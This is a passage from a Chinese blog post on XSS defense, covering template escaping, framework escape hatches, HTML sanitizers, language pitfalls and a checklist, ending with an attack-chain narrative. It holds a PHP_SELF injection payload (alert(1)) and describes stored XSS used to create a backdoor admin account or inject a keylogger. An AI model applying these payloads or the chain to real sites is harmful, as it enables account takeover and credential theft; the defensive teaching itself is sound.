<h4 id="4-5-使用安全的模板引擎"><a href="#4-5-使用安全的模板引擎" class="headerlink" title="4.5 使用安全的模板引擎"></a>4.5 使用安全的模板引擎</h4><p>现代模板引擎默认对变量做 HTML 转义，大幅降低了 XSS 风险：</p>
<pre><code class="jinja2">&#123;# Jinja2 (Python/Flask)：默认转义 #&#125;
&lt;p&gt;&#123;&#123; user_input &#125;&#125;&lt;/p&gt;
&#123;# user_input 中的 < > & 等字符会被自动转义 #&#125;
</code></pre>
<pre><code class="ejs">&lt;!-- EJS (Node.js)：使用 &lt;%= %&gt; 自动转义 --&gt;
&lt;p&gt;&lt;%= userInput %&gt;&lt;/p&gt;
</code></pre>
<pre><code class="thymeleaf">&lt;!-- Thymeleaf (Java/Spring)：默认转义 --&gt;
&lt;p th:text=&quot;$&#123;userInput&#125;&quot;&gt;&lt;/p&gt;
</code></pre>
<p><strong>危险操作：</strong> 使用”原始输出”标签会跳过转义，必须确保数据已经过清洗：</p>
<pre><code class="jinja2">&#123;# Jinja2：|safe 过滤器跳过转义，危险！ #&#125;
&lt;p&gt;&#123;&#123; user_input | safe &#125;&#125;&lt;/p&gt;

&#123;# Django：|safe 过滤器同理 #&#125;
&lt;p&gt;&#123;&#123; user_input | safe &#125;&#125;&lt;/p&gt;
</code></pre>
<h4 id="4-6-框架内置防护"><a href="#4-6-框架内置防护" class="headerlink" title="4.6 框架内置防护"></a>4.6 框架内置防护</h4><p>主流前端框架默认对插值做转义：</p>
<pre><code class="jsx">// React：默认转义 JSX 中的变量
&lt;div&gt;&#123;userInput&#125;&lt;/div&gt;
// userInput 中的 &lt;script&gt; 会被转义为 &amp;lt;script&amp;gt;

// 危险操作：dangerouslySetInnerHTML 绕过转义
&lt;div dangerouslySetInnerHTML=&#123;&#123;__html: userInput&#125;&#125; /&gt;
</code></pre>
<pre><code class="vue">&lt;!-- Vue：&#123;&#123; &#125;&#125; 默认转义 --&gt;
&lt;p&gt;&#123;&#123; userInput &#125;&#125;&lt;/p&gt;

&lt;!-- 危险操作：v-html 绕过转义 --&gt;
&lt;p v-html=&quot;userInput&quot;&gt;&lt;/p&gt;
</code></pre>
<pre><code class="angular">&lt;!-- Angular：[] 绑定默认转义 --&gt;
&lt;p&gt;&#123;&#123; userInput &#125;&#125;&lt;/p&gt;

&lt;!-- 危险操作：bypassSecurityTrustHtml 绕过转义 --&gt;
&lt;div [innerHTML]=&quot;sanitizedHtml&quot;&gt;&lt;/div&gt;
</code></pre>
<p>这些框架的默认行为是安全的，但开发者使用 <code>dangerouslySetInnerHTML</code>、<code>v-html</code>、<code>bypassSecurityTrustHtml</code> 等”逃生舱”时会主动放弃防护。</p>
<h4 id="4-7-富文本场景的特殊处理"><a href="#4-7-富文本场景的特殊处理" class="headerlink" title="4.7 富文本场景的特殊处理"></a>4.7 富文本场景的特殊处理</h4><p>富文本编辑器允许用户提交 HTML，不能简单做全量转义。需要专门的 HTML 清洗：</p>
<pre><code class="javascript">// 使用 DOMPurify（推荐）
import DOMPurify from &#39;dompurify&#39;;
const clean = DOMPurify.sanitize(dirtyHtml, &#123;
  ALLOWED_TAGS: [&#39;p&#39;, &#39;b&#39;, &#39;i&#39;, &#39;em&#39;, &#39;strong&#39;, &#39;a&#39;, &#39;img&#39;, &#39;ul&#39;, &#39;ol&#39;, &#39;li&#39;],
  ALLOWED_ATTR: [&#39;href&#39;, &#39;src&#39;, &#39;alt&#39;, &#39;title&#39;, &#39;target&#39;],
  ALLOW_DATA_ATTR: false
&#125;);
</code></pre>
<pre><code class="python"># Python: 使用 bleach
import bleach

clean = bleach.clean(dirty_html,
    tags=[&#39;p&#39;, &#39;b&#39;, &#39;i&#39;, &#39;em&#39;, &#39;strong&#39;, &#39;a&#39;, &#39;img&#39;],
    attributes=&#123;&#39;a&#39;: [&#39;href&#39;, &#39;title&#39;], &#39;img&#39;: [&#39;src&#39;, &#39;alt&#39;]&#125;,
    strip=True
)
</code></pre>
<pre><code class="java">// Java: 使用 OWASP Java HTML Sanitizer
PolicyFactory policy = new HtmlPolicyBuilder()
    .allowElements(&quot;p&quot;, &quot;b&quot;, &quot;i&quot;, &quot;em&quot;, &quot;strong&quot;, &quot;a&quot;, &quot;img&quot;)
    .allowAttributes(&quot;href&quot;).onElements(&quot;a&quot;)
    .allowAttributes(&quot;src&quot;, &quot;alt&quot;).onElements(&quot;img&quot;)
    .allowUrlProtocols(&quot;https&quot;)
    .toFactory();
String safeHtml = policy.sanitize(dirtyHtml);
</code></pre>
<p>关键配置要点：禁止 <code>&lt;script&gt;</code>、<code>&lt;iframe&gt;</code>、<code>&lt;object&gt;</code>、<code>&lt;embed&gt;</code> 标签；禁止 <code>on*</code> 事件属性；禁止 <code>javascript:</code> 协议的 URL；禁止 <code>&lt;style&gt;</code> 标签（CSS 也可用于攻击）。</p>
<hr>
<h3 id="五、各语言-框架常见陷阱"><a href="#五、各语言-框架常见陷阱" class="headerlink" title="五、各语言/框架常见陷阱"></a>五、各语言/框架常见陷阱</h3><h4 id="5-1-Java"><a href="#5-1-Java" class="headerlink" title="5.1 Java"></a>5.1 Java</h4><ul>
<li><code>JSP</code> 的 <code>&lt;%= variable %&gt;</code> 不会自动转义（除非配置 <code>escapeXml</code>）</li>
<li>Spring MVC 的 <code>@ResponseBody</code> 返回 JSON 时，如果 Content-Type 设置错误（如 <code>text/html</code>），JSON 中的用户数据可能被浏览器当 HTML 解析</li>
<li><code>StringEscapeUtils.escapeHtml()</code> 在旧版 Commons Lang 中不处理所有 Unicode 字符</li>
</ul>
<h4 id="5-2-PHP"><a href="#5-2-PHP" class="headerlink" title="5.2 PHP"></a>5.2 PHP</h4><ul>
<li><code>echo $userInput</code> 不做任何转义，是 XSS 最常见的根源</li>
<li><code>htmlspecialchars()</code> 必须指定 <code>ENT_QUOTES</code> 和字符编码，否则单引号和特殊编码可能绕过</li>
<li><code>$_SERVER[&#39;PHP_SELF&#39;]</code> 包含 URL 路径，如果直接用于 <code>form action</code> 属性，路径部分可被注入</li>
</ul>
<pre><code class="php">&lt;!-- 危险：PHP_SELF 可被注入 --&gt;
&lt;form action=&quot;&lt;?php echo $_SERVER[&#39;PHP_SELF&#39;]; ?&gt;&quot;&gt;

&lt;!-- 如果访问 /page.php/&lt;script&gt;alert(1)&lt;/script&gt; --&gt;
&lt;!-- 渲染为 --&gt;
&lt;form action=&quot;/page.php/&lt;script&gt;alert(1)&lt;/script&gt;&quot;&gt;
</code></pre>
<h4 id="5-3-Python"><a href="#5-3-Python" class="headerlink" title="5.3 Python"></a>5.3 Python</h4><ul>
<li>Flask 的 <code>render_template_string</code> 如果使用 <code>&#123;&#123; variable | safe &#125;&#125;</code> 会跳过转义</li>
<li>Django 的 <code>mark_safe()</code> 和 <code>|safe</code> 过滤器同理</li>
<li><code>json.dumps()</code> 默认不转义 <code>&lt;</code> <code>&gt;</code> <code>&amp;</code>，如果 JSON 被嵌入 HTML 页面，可能被 XSS 利用</li>
</ul>
<pre><code class="python"># 危险：JSON 嵌入 HTML
&lt;script&gt;
  var data = &#123;&#123; user_data | safe &#125;&#125;;  # 如果 user_data 包含 &lt;/script&gt;，会闭合标签
&lt;/script&gt;

# 安全做法：使用 |tojson 过滤器（Flask 提供）
&lt;script&gt;
  var data = &#123;&#123; user_data | tojson &#125;&#125;;
&lt;/script&gt;
</code></pre>
<h4 id="5-4-Node-js"><a href="#5-4-Node-js" class="headerlink" title="5.4 Node.js"></a>5.4 Node.js</h4><ul>
<li>Express 的 <code>res.send(userInput)</code> 如果 Content-Type 是 <code>text/html</code>，直接输出未转义内容</li>
<li><code>res.json()</code> 是安全的（Content-Type 为 <code>application/json</code>），但前端如果用 <code>innerHTML</code> 渲染 JSON 数据，仍然会触发 XSS</li>
<li>EJS 的 <code>&lt;%- %&gt;</code> 不转义，<code>&lt;%= %&gt;</code> 转义，容易混淆</li>
</ul>
<hr>
<h3 id="六、完整防御清单"><a href="#六、完整防御清单" class="headerlink" title="六、完整防御清单"></a>六、完整防御清单</h3><p>按优先级排列：</p>
<ol>
<li>输出编码——根据插入上下文选择对应的编码函数（HTML/属性/JS/URL/CSS）</li>
<li>使用默认转义的模板引擎或前端框架，避免使用”逃生舱”</li>
<li>部署 CSP——禁止 <code>unsafe-inline</code>，使用 <code>nonce</code> 或 <code>hash</code> 机制</li>
<li>富文本场景使用专业 HTML 清洗库（DOMPurify / bleach / OWASP Sanitizer）</li>
<li>敏感 Cookie 设置 <code>HttpOnly</code> + <code>Secure</code> + <code>SameSite</code></li>
<li>输入验证作为辅助——白名单校验格式固定的字段</li>
<li>避免将用户数据放入 <code>innerHTML</code>、<code>document.write</code>、<code>eval</code> 等 sink</li>
<li>对 JSON 嵌入 HTML 场景使用专用序列化（如 <code>|tojson</code>）</li>
<li>定期使用自动化扫描工具（如 OWASP ZAP、Burp Suite）检测 XSS</li>
<li>安全响应头：<code>X-Content-Type-Options: nosniff</code>、<code>X-XSS-Protection</code>（旧浏览器）</li>
</ol>
<hr>
<h3 id="七、攻击链示例：从-XSS-到完全接管"><a href="#七、攻击链示例：从-XSS-到完全接管" class="headerlink" title="七、攻击链示例：从 XSS 到完全接管"></a>七、攻击链示例：从 XSS 到完全接管</h3><p>一个典型的完整攻击链：</p>
<ol>
<li>发现评论区存在存储型 XSS → 输入 <code>&lt;img src=x onerror=...&gt;</code> 未被过滤</li>
<li>脚本窃取管理员的 Cookie → 但 Cookie 设置了 <code>HttpOnly</code>，无法读取</li>
<li>改为利用 XSS 发起 CSRF 请求 → 以管理员身份调用 <code>/api/admin/create-user</code> 创建后门账户</li>
<li>或者：利用 XSS 注入键盘记录器 → 等待管理员在页面上输入敏感操作密码</li>
<li>如果 CSP 阻止了内联脚本 → 寻找 JSONP 端点或 CORS 配置错误来加载外部脚本</li>
<li>如果所有防御都到位 → 转向其他攻击面（SQL 注入、SSRF、文件上传等）</li>
</ol>
<p>这条攻击链说明：XSS 不仅仅是一个”弹个 alert”的漏洞，它是攻击者进入用户浏览器上下文的入口，后续的利用空间取决于攻击者的创造力和系统的纵深防御水平。</p>

                
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="/about" rel="external nofollow noreferrer">小竹</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://example.com/2026/08/06/2026-08-06-xss-attacks-principles-and-defense/">http://example.com/2026/08/06/2026-08-06-xss-attacks-principles-and-defense/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="/about" target="_blank">小竹</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/%E5%AE%89%E5%85%A8/">
                                    <span class="chip bg-color">安全</span>
                                </a>
                            
                                <a href="/tags/Web%E5%AE%89%E5%85%A8/">
                                    <span class="chip bg-color">Web安全</span>
                                </a>
                            
                                <a href="/tags/XSS/">
                                    <span class="chip bg-color">XSS</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.jpg" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>

            
        </div>
    </div>

    

    

    

    

    

    

    

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="far fa-dot-circle"></i>&nbsp;本篇
            </div>
            <div class="card">
                <a href="/2026/08/06/2026-08-06-xss-attacks-principles-and-defense/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/14.jpg" class="responsive-img" alt="XSS 跨站脚本攻击：原理、攻击与防御">
                        
                        <span class="card-title">XSS 跨站脚本攻击：原理、攻击与防御</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2026-08-06
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            小竹
                            
                        </span>
                    </div>
                </div>

                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E5%AE%89%E5%85%A8/">
                        <span class="chip bg-color">安全</span>
                    </a>
                    
                    <a href="/tags/Web%E5%AE%89%E5%85%A8/">
                        <span class="chip bg-color">Web安全</span>
                    </a>
                    
                    <a href="/tags/XSS/">
                        <span class="chip bg-color">XSS</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/2026/08/06/2026-08-06-file-upload-security/">
                    <div class="card-image">
                        
                        
                        <img src="/medias/featureimages/23.jpg" class="responsive-img" alt="文件上传安全：原理、攻击与防御">
                        
                        <span class="card-title">文件上传安全：原理、攻击与防御</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2026-08-06
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-user fa-fw"></i>
                            小竹
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/%E5%AE%89%E5%85%A8/">
                        <span class="chip bg-color">安全</span>
                    </a>
                    
                    <a href="/tags/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/">
                        <span class="chip bg-color">文件上传</span>
                    </a>
                    
                    <a href="/tags/Web%E5%AE%89%E5%85%A8/">
                        <span class="chip bg-color">Web安全</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>



<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="/libs/aplayer/Meting.min.js"></script>

    

    <div class="container row center-align"
         style="margin-bottom: 0px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2021-2026</span>
            
            <a href="/about" target="_blank">小竹</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            
            
                
            
            
                <span id="busuanzi_container_site_pv">
                &nbsp;|&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;
                    <span id="busuanzi_value_site_pv" class="white-color"></span>
            </span>
            
            
                <span id="busuanzi_container_site_uv">
                &nbsp;|&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;
                    <span id="busuanzi_value_site_uv" class="white-color"></span>
            </span>
            
            <br>

            <!-- 运行天数提醒. -->
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/zhuyanzhen-lab" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>















</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    

    

    <!-- 雪花特效 -->
    

    <!-- 鼠标星星特效 -->
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
